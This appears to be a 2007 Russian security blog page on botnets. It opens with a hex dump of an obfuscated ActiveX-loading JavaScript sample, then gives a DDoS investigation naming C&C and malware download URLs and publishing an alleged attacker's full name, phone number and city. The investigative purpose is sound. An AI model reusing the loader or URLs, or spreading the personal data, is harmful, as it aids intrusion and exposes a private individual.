6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 ng.fromCharCode(
76 34 37 35 38 37 62 31 33 62 39 30 34 66 28 76 v47587b13b904f(v
34 37 35 38 37 62 31 33 62 61 33 64 33 2e 73 75 47587b13ba3d3.su
62 73 74 72 28 76 34 37 35 38 37 62 31 33 62 61 bstr(v47587b13ba
62 61 32 2c 20 32 29 29 29 29 3b 7d 72 65 74 75 ba2, 2))));}retu
72 6e 20 76 34 37 35 38 37 62 31 33 62 61 37 62 rn v47587b13ba7b
63 3b 7d 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 c;} document.wri
74 65 28 76 34 37 35 38 37 62 31 33 62 39 66 65 te(v47587b13b9fe
63 28 27 30 44 30 41 30 44 30 41 33 43 37 33 36 c('0D0A0D0A3C736
33 37 32 36 39 37 30 37 34 32 30 36 43 36 31 36 372697074206C616
45 36 37 37 35 36 31 36 37 36 35 33 44 32 32 36 E67756167653D226
41 36 31 37 36 36 31 37 33 36 33 37 32 36 39 37 A617661736372697
30 37 34 32 32 33 45 30 44 30 41 36 36 37 35 36 074223E0D0A66756
45 36 33 37 34 36 39 36 46 36 45 32 30 34 33 37 E6374696F6E20437
32 34 46 32 38 36 46 32 43 32 30 36 45 32 39 32 24F286F2C206E292
30 37 42 30 44 30 41 37 36 36 31 37 32 32 30 37 07B0D0A766172207
39 32 30 33 44 32 30 36 45 37 35 36 43 36 43 33 9203D206E756C6C3
42 30 44 30 41 37 34 37 32 37 39 32 30 37 42 32 B0D0A747279207B2
30 36 35 37 36 36 31 36 43 32 38 32 32 37 39 32 06576616C2822792
30 33 44 32 30 36 46 32 45 34 33 37 32 36 35 36 03D206F2E4372656
31 37 34 36 35 34 46 36 32 36 41 36 35 36 33 37 174654F626A65637
34 32 38 36 45 32 39 32 32 32 39 32 30 37 44 36 4286E292229207D6
33 36 31 37 34 36 33 36 38 32 38 36 35 32 39 37 3617463682865297
42 37 44 30 44 30 41 36 39 36 36 32 30 32 38 32 B7D0D0A696620282
31 32 30 37 39 32 39 32 30 37 42 37 34 37 32 37 1207929207B74727
39 32 30 37 42 32 30 36 35 37 36 36 31 36 43 32 9207B206576616C2
38 32 32 37 39 32 30 33 44 32 30 36 46 32 45 34 82279203D206F2E4
33 37 32 36 35 36 31 37 34 36 35 34 46 36 32 36 372656174654F626
41 36 35 36 33 37 34 32 38 36 45 32 43 32 30 35 A656374286E2C205
43 32 32 35 43 32 32 32 39 32 32 32 39 32 30 37 C225C22292229207
44 36 33 36 31 37 34 36 33 36 38 32 38 36 35 32 D636174636828652
39 37 42 37 44 37 44 30 44 30 41 36 39 36 36 32 97B7D7D0D0A69662
30 32 38 32 31 32 30 37 39 32 39 32 30 37 42 37 02821207929207B7
34 37 32 37 39 32 30 37 42 32 30 36 35 37 36 36 47279207B2065766
31 36 43 32 38 32 32 37 39 32 30 33 44 32 30 36 16C282279203D206
46 32 45 34 33 37 32 36 35 36 31 37 34 36 35 34 F2E4372656174654
46 36 32 36 41 36 35 36 33 37 34 32 38 36 45 32 F626A656374286E2
43 32 30 35 43 32 32 35 43 32 32 32 43 32 30 35 C205C225C222C205
43 32 32 35 43 32 32 32 39 32 32 32 39 32 30 37 C225C22292229207
44 36 33 36 31 37 34 36 33 36 38 32 38 36 35 32 D636174636828652
39 37 42 37 44 37 44 30 44 30 41 36 39 36 36 32 97B7D7D0D0A69662
30 32 38 32 31 32 30 37 39 32 39 32 30 37 42 37 02821207929207B7
34 37 32 37 39 32 30 37 42 32 30 36 35 37 36 36 47279207B2065766
31 36 43 32 38 32 32 37 39 32 30 33 44 32 30 36 16C282279203D206
46 32 45 34 37 36 35 37 34 34 46 36 32 36 41 36 F2E4765744F626A6
35 36 33 37 34 32 38 35 43 32 32 35 43 32 32 32 56374285C225C222
43 32 30 36 45 32 39 32 32 32 39 32 30 37 44 36 C206E292229207D6
33 36 31 37 34 36 33 36 38 32 38 36 35 32 39 37 3617463682865297
42 37 44 37 44 30 44 30 41 36 39 36 36 32 30 32 B7D7D0D0A6966202
38 32 31 32 30 37 39 32 39 32 30 37 42 37 34 37 821207929207B747
32 37 39 32 30 37 42 32 30 36 35 37 36 36 31 36 279207B206576616
43 32 38 32 32 37 39 32 30 33 44 32 30 36 46 32 C282279203D206F2
45 34 37 36 35 37 34 34 46 36 32 36 41 36 35 36 E4765744F626A656
33 37 34 32 38 36 45 32 43 32 30 35 43 32 32 35 374286E2C205C225
43 32 32 32 39 32 32 32 39 32 30 37 44 36 33 36 C22292229207D636
31 37 34 36 33 36 38 32 38 36 35 32 39 37 42 37 17463682865297B7
44 37 44 30 44 30 41 36 39 36 36 32 30 32 38 32 D7D0D0A696620282
31 32 30 37 39 32 39 32 30 37 42 37 34 37 32 37 1207929207B74727
39 32 30 37 42 32 30 36 35 37 36 36 31 36 43 32 9207B206576616C2
38 32 32 37 39 32 30 33 44 32 30 36 46 32 45 34 82279203D206F2E4
37 36 35 37 34 34 46 36 32 36 41 36 35 36 33 37 765744F626A65637
34 32 38 36 45 32 39 32 32 32 39 32 4286E2922292
Мы оповестили Касперских.
Развитие и комментарии последуют
вторник, 17 июля 2007 г.
Список Командных Центров Ботнетов (C&C)
Большое распространение имеют C&C на основе Internet Relay Chat (IRC). Список командных центров сетей Ботов на 17 июля 10:00 (GMT+4) смотри внутри. Данные уже ввиде готового фильтра и готовы к использованию.
Данная информация предоставлена аналитической системой обнаружения неизвестных и известных сетевых аномалий ARBOR Peakflow SP
Данная информация предоставлена аналитической системой обнаружения неизвестных и известных сетевых аномалий ARBOR Peakflow SP
четверг, 12 июля 2007 г.
Список потенциально опасных доменных имен....
В списке домены на которых были обнаружены управляющие сервера, либо эксплоиты http://webhelper4u.net/whmembers/siteslists/cwsalphaA.txt
Сылка любезно предоставленна BiZz (IT Consult).
среда, 11 июля 2007 г.
Microsoft против вирусов (бесплатно!)
Microsoft выпустил набор инструкций и утилит для борьбы с вредоносным кодом и рядом информационных угроз.
www.microsoft.com/technet/security/guidance/disasterrecovery/malware/default.mspx
Здесь можно бесплатно все это получить. В том числе и live - CD для очистки хостов от различной заразы. Радует то, что к тулзам прилагаются подробные инструкции, которые могут стать основой информационной безопасности для малых и средних предприятий, которые не могут позволить себе профессионалов в штате. Админ осваивает и использует =).
Надеюсь рано или поздно мы заполучим к себе в авторы людей из Редмонда, уверен им есть, что рассказать.
www.microsoft.com/technet/security/guidance/disasterrecovery/malware/default.mspx
Здесь можно бесплатно все это получить. В том числе и live - CD для очистки хостов от различной заразы. Радует то, что к тулзам прилагаются подробные инструкции, которые могут стать основой информационной безопасности для малых и средних предприятий, которые не могут позволить себе профессионалов в штате. Админ осваивает и использует =).
Надеюсь рано или поздно мы заполучим к себе в авторы людей из Редмонда, уверен им есть, что рассказать.
воскресенье, 8 июля 2007 г.
О том как это делать...
Пример расследования атаки на сети, может кто - то сочтет опыт полезным:2 марта 2007 года интернет-хостинг компании "*******" (торговая марка "*********") подвергся массированной распределенной атаке на отказ в обслуживании ДДоС. Целью атаки служил сервер для виртуального хостинга с адресом **********. На сервере были размещены страницы ** клиентов. Атака была настолько мощная, что вызвала замедление работы всей сети . Соответствующая служба была вынужденна поставить фильтр на пограничных маршрутизаторах сети, что привело к полному блокированию сервера-жертвы.
Используя статистику, собранную комплексом "Arbor", удалось установить список зараженных компьютеров участвовавших в атаке. Наибольшую активность проявил хост с адресом **********, принадлежащий к домашней сети, обслуживаемой компанией "*******". Администрация "******" оказала поддержку расследованию и предоставила запись соединений зараженного компьютера.
Анализ соединений позволил установить центр управления сетью зараженных компьютеров "Ботнета":
http://ddos-net.info/cgi-bin/get.cgi?data=...i4xNi41Mi43Ng==
Доменное имя ddos-net.info было зарегистрировано по поддельным данным на :
Используя статистику, собранную комплексом "Arbor", удалось установить список зараженных компьютеров участвовавших в атаке. Наибольшую активность проявил хост с адресом **********, принадлежащий к домашней сети, обслуживаемой компанией "*******". Администрация "******" оказала поддержку расследованию и предоставила запись соединений зараженного компьютера.
Анализ соединений позволил установить центр управления сетью зараженных компьютеров "Ботнета":
http://ddos-net.info/cgi-bin/get.cgi?data=...i4xNi41Mi43Ng==
Доменное имя ddos-net.info было зарегистрировано по поддельным данным на :
Whois Record
Domain ID:D16409673-LRMS
Domain Name:DDOS-NET.INFO
Created On:06-Feb-2007 18:41:14 UTC
Last Updated On:06-Feb-2007 18:41:16 UTC
Expiration Date:06-Feb-2008 18:41:14 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:DI_3715873
Registrant Name:AlpCRAZY
Registrant Organization:AlpCRAZY
Registrant Street1:AlpCRAZY - TeaM
Registrant Street2:
Registrant Street3:
Registrant City:iNFECTED
Registrant State/Province:
Registrant Postal Code:337614
Registrant Country:NP
Registrant Phone:+067.337614
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:
Admin ID:DI_3715873
Admin Name:AlpCRAZY
Admin Organization:AlpCRAZY
Admin Street1:AlpCRAZY - TeaM
Admin Street2:
Admin Street3:
Admin City:iNFECTED
Admin State/Province:
Admin Postal Code:337614
Admin Country:NP
Admin Phone:+067.337614
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:
Для уничтожения "Ботнет" мы обратились (через наших партнеров, а именно -- компанию "Verisign") к регистратору доменных имен в зоне .info с просьбой расторгнуть соглашение на предоставление домена ddos-net.info. Учитывая то, что зараженные компьютеры получают инструкции центрального сервера, ориентируясь на определенное доменное имя, расторжение договора на предоставление домена - наиболее эффективный способ уничтожения "Ботнет".
Следующим шагом стал поиск лиц, ответственных за атаку. Используя открытые источники информации было найдено объявление о заказных распределенных атаках на отказ в обслуживании:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Предоставляем услуги ДДОС
БотНет постоянно увеличивается.
1 час - 10$
Cутки - 50$
Крупные проэкты - 65$
Даем 20 минут на тест.
По вопросам организации ДДОС обращатся в ICQ#: 337614 или ICQ#: 278-830-276
Постоянно происходят обновления и новые разработки софта, за которыми вы можете следить на нашем сайте iNFECTED-TeaM.InFO
За покупкой стучите в ICQ: 337614 или 741873
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Дальнейшее направление исследования было сфокусировано на поиске информации о лице, с ником AlpCRAZY, на имя которого зарегистрирован домен ddos-net.info.
В результате анализа данных с использованием открытых поисковых систем была получена следующая информация:
В результате анализа данных с использованием открытых поисковых систем была получена следующая информация:
Ник: alpCRAZY
ICQ: 337614
ФИО: Влад Солопченко
Телефон: +380 562 389471
Страна: Украина
Город: Днепропетровск
Фото тут: http://mailovka.ru/files/xo3e/xo3e0x02/ENT...;/alpcrazy.jpeg
Информация на форумах:
http://209.85.129.104/search?q=cache:lmPBK...=clnk&cd=15
http://forum.opensex.ru/index.php?showuser=114
http://www.snowboarding.com.ua/Riders/alpcrazy.html http://mailovka.ru/files/xo3e/xo3e0x02/0x05.txt
Сайты:
http://www.infected-team.info/
http://socks.bz
23 марта 2007 года alpCRAZY предпринял попытку изменить дислокацию "Ботнет", проинструктировав зараженные компьютеры на обновление версии вредоносного ПО с сервера http://infected-team.info/bnew.exe. Информация о противоправном использовании доменного имени была направлена регистратору и домен был блокирован.
Вся имеющаяся информация, касающаяся инцидента, была предоставлена профильным организациям и правоохранительным органам.
Вся имеющаяся информация, касающаяся инцидента, была предоставлена профильным организациям и правоохранительным органам.
Подписаться на:
Сообщения (Atom)